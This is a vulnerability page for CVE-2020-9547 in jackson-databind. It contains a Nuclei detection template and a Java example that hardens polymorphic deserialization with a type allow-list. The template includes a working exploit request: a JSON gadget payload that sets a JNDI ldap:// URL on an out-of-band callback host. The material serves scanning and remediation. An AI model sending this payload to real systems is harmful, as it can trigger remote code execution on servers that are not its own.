FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). This vulnerability allows attackers to execute arbitrary code through deserialization of untrusted data when polymorphic type handling (@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS) is enabled.
PoC code [publicly available]
id: CVE-2020-9547

info:
  name: FasterXML jackson-databind - Deserialization Remote Code Execution
  author: pranjalnegi
  severity: critical
  description: |
    FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). This vulnerability allows attackers to execute arbitrary code through deserialization of untrusted data when polymorphic type handling (@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS) is enabled.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary code on the affected system through deserialization of malicious JSON payloads.
  remediation: |
    Update FasterXML jackson-databind to version 2.9.10.4 or later. Alternatively, disable polymorphic type handling or implement proper input validation and deserialization controls.
  reference:
    - https://github.com/fairyming/CVE-2020-9547
    - https://github.com/FasterXML/jackson-databind/issues/2620
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9547
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-9547
    cwe-id: CWE-502
    epss-score: 0.53634
    epss-percentile: 0.97918
    cpe: cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fasterxml
    product: jackson-databind
    verified: true
  tags: cve,cve2020,jackson,databind,deserialization,rce

variables:
  randstr: "{{rand_text_alphanumeric(8)}}"
  payload_jndi_ldap: "ldap://{{interactsh-url}}/{{randstr}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        ["com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",{"properties":["java.util.Properties",{"UserTransaction":"{{payload_jndi_ldap}}"}]}]

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'dns')"
          - "contains_any(content_type, 'application/json', 'text/plain')"
          - "status_code == 200 || status_code == 400 || status_code == 500"
        condition: and

      - type: word
        part: body
        words:
          - "JsonMappingException"
          - "InvalidTypeIdException"
          - "JdbcRowSetImpl"
          - "com.fasterxml.jackson.databind"
          - "javax.naming.NamingException"
        condition: or
# digest: 4b0a00483046022100b13a6e5dc487897cbaeaef7719cc8c644699eef859f14b9380bd5dbf7643eecb022100c39e9b18089702bc1a1955cedb037cecb469055559b63150a61758659bb66393:922c64590222798bb761d5b6d8e72950
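The remediation above asks for polymorphic type handling to be disabled or constrained. The following is an added example, not code from this page or from the jackson-databind project: it shows the weak pattern the advisory describes (an Object-typed property with @JsonTypeInfo use=Id.CLASS, or the deprecated ObjectMapper.enableDefaultTyping()) beside a hardened ObjectMapper that only admits type ids from the application's own package, and feeds it the page's gadget class name in the property form that Id.CLASS expects by default. The package com.example.shapes, the Shape/Circle types, the holder classes and the method names are assumptions made for the illustration; BasicPolymorphicTypeValidator and JsonMapper.builder().polymorphicTypeValidator() exist from jackson-databind 2.10, and MapperFeature.BLOCK_UNSAFE_POLYMORPHIC_BASE_TYPES from 2.11.

```java
package com.example.shapes;

import java.util.Optional;

import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.MapperFeature;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.json.JsonMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

/** Hypothetical application types; the allow-list below is keyed to this package. */
public class PolymorphicTypingHardening {

    public interface Shape { }

    public static final class Circle implements Shape {
        public double radius;
    }

    // Weak pattern from the advisory: an Object-typed property with Id.CLASS lets the
    // JSON name any class on the classpath (the deprecated enableDefaultTyping() has the
    // same effect for every Object-typed value). Shown for contrast only; not read below.
    public static final class WeakHolder {
        @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
        public Object payload;
    }

    // Hardened pattern: a narrow base type, combined with the validator configured below.
    public static final class SafeHolder {
        @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
        public Shape payload;
    }

    public static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                // only classes under our own package may appear as a type id
                .allowIfSubType("com.example.shapes.")
                .build();
        return JsonMapper.builder()
                // applies the validator to @JsonTypeInfo-annotated properties (2.10+)
                .polymorphicTypeValidator(ptv)
                // refuses to build polymorphic deserializers for Object, Serializable, etc. (2.11+)
                .enable(MapperFeature.BLOCK_UNSAFE_POLYMORPHIC_BASE_TYPES)
                .build();
    }

    /** Reads untrusted JSON; a rejected type id becomes an empty result, never a class load. */
    public static Optional<Shape> readUntrusted(ObjectMapper mapper, String json) {
        try {
            return Optional.ofNullable(mapper.readValue(json, SafeHolder.class).payload);
        } catch (JsonMappingException e) {
            // InvalidTypeIdException (disallowed or unknown type id) lands here
            System.err.println("rejected: " + e.getOriginalMessage());
            return Optional.empty();
        } catch (JsonProcessingException e) {
            System.err.println("malformed JSON: " + e.getOriginalMessage());
            return Optional.empty();
        }
    }

    public static void main(String[] args) {
        ObjectMapper mapper = hardenedMapper();

        // Constructed sample: the page's gadget class, in the "@class" property form.
        String hostile = "{\"payload\":{\"@class\":"
                + "\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\","
                + "\"properties\":{}}}";
        // Constructed sample: a legitimate value from our own package.
        String benign = "{\"payload\":{\"@class\":"
                + "\"com.example.shapes.PolymorphicTypingHardening$Circle\",\"radius\":2.5}}";

        System.out.println("hostile accepted? " + readUntrusted(mapper, hostile).isPresent());
        System.out.println("benign accepted?  " + readUntrusted(mapper, benign).isPresent());
    }
}
```

Note that the 2.9.10.4 fix named in the remediation only adds this gadget to jackson-databind's blocklist; the allow-list approach above, which needs 2.10 or later, is what stops the next gadget class that is not yet on that list.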